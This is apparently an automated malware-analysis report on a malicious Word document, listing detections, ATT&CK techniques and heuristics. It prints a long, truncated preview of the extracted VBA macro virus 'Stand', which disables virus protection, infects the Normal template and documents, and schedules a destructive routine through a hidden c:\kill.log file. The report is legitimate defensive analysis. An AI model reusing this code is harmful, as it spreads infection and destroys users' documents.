Verdict: MALICIOUS
Risk Score: 280

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Akuma-3. The presence of AutoOpen, Document_Open, and Auto_Close macros indicates a high likelihood of malicious VBA code execution. The Document_Close subroutine attempts to create and manage a file at 'c:\kill.log', suggesting a persistence or staging mechanism.
Heuristics (6)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32161 bytes |

SHA-256: 8a1d7680bf2346620ba7833a90a45d9bf1d751ac8e9dec8bc3ff01fd3086ad53
Detection: ClamAV: Doc.Trojan.Akuma-3
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Stand
'2
On Error Resume Next
If Dir("c:\kill.log", vbArchive + vbHidden + vbReadOnly) = "" Then
Open "c:\kill.log" For Output As #1
Randomize
Dataccia = DateAdd("d", Int((30 * Rnd) + 1), Date)
Print #1, Dataccia
Close #1
SetAttr "c:\kill.log", vbArchive + vbHidden + vbReadOnly
Else
Open "c:\kill.log" For Input As #1
Line Input #1, Dataccia
If DateDiff("d", Date, Dataccia) <= 0 Then StandDestroy
Close #1
End If
End Sub
Private Sub Document_Open()
'Stand
'2
Stand
End Sub
Private Sub Document_New()
'Stand
'2
Stand
End Sub
Private Sub Stand()
'Stand
'2
'Copies: 62
On Error Resume Next
stato = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Application.DisplayRecentFiles = True
RecentFiles.Maximum = 9
Set mad = NormalTemplate.VBProject.VBComponents.Item(1)
For c = 1 To 2
If Left(StandFind(mad, "Private Sub Stand()", True), Len("Stand Yes")) = "Stand Yes" Then GoTo NoClear
lm = StandClear(mad, "Sub Document_Close()")
lm = StandClear(mad, "Private Sub Document_Close()")
lm = StandClear(mad, "Sub Document_New()")
lm = StandClear(mad, "Private Sub Document_New()")
lm = StandClear(mad, "Sub Document_Open()")
lm = StandClear(mad, "Private Sub Document_Open()")
lm = StandClear(mad, "Sub AutoClose()")
lm = StandClear(mad, "Private Sub AutoClose()")
lm = StandClear(mad, "Sub AutoOpen()")
lm = StandClear(mad, "Private Sub AutoOpen()")
lm = StandClear(mad, "Sub AutoNew()")
lm = StandClear(mad, "Private Sub AutoNew()")
lm = StandClear(mad, "Private Sub Stand()")
lm = StandClear(mad, "Private Function StandClear(DoveM, StartM)")
lm = StandClear(mad, "Private Sub StandDestroy()")
lm = StandClear(mad, "Private Function StandFind(DoveM, StartM, Infect)")
lm = StandClear(mad, "Private Function StandInfect()")
lm = StandClear(mad, "Private Function StandWrite(StartM)")
NoClear:
Set mad = ActiveDocument.VBProject.VBComponents.Item(1)
Next c
SetAttr "c:\Stand.log", vbNormal
Kill "c:\Stand.log"
Open "c:\Stand.log" For Output As #1
lm = StandWrite("Private Sub Document_Close()")
lm = StandWrite("Private Sub Document_Open()")
lm = StandWrite("Private Sub Document_New()")
lm = StandWrite("Private Sub Stand()")
lm = StandWrite("Private Function StandClear(DoveM, StartM)")
lm = StandWrite("Private Sub StandDestroy()")
lm = StandWrite("Private Function StandFind(DoveM, StartM, Infect)")
lm = StandWrite("Private Function StandInfect()")
lm = StandWrite("Private Function StandWrite(StartM)")
Close #1
SetAttr "c:\Stand.log", vbNormal
lm = StandInfect
Kill "c:\Stand.log"
Randomize
If Int((10 * Rnd) + 1) = 6 Then
With Dialogs(wdDialogFileSummaryInfo)
.Title = "Stand Macro Carrier"
.Author = "Lonely Mad"
.Keywords = "I'll destroy you"
.Execute
End With
End If
If Left(ActiveDocument.Name, 8) <> "Document" And lm = 2 Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
ActiveDocument.Saved = stato
On Error GoTo 0
End Sub
Private Function StandClear(DoveM, StartM)
'Stand
'2
Count = StandFind(DoveM, StartM, True)
If Left(Count, 5) <> "Stand" Then
Do Until DoveM.CodeModule.Lines(Count, 1) = "End Sub" Or DoveM.CodeModule.Lines(Count, 1) = "End Function"
... (truncated)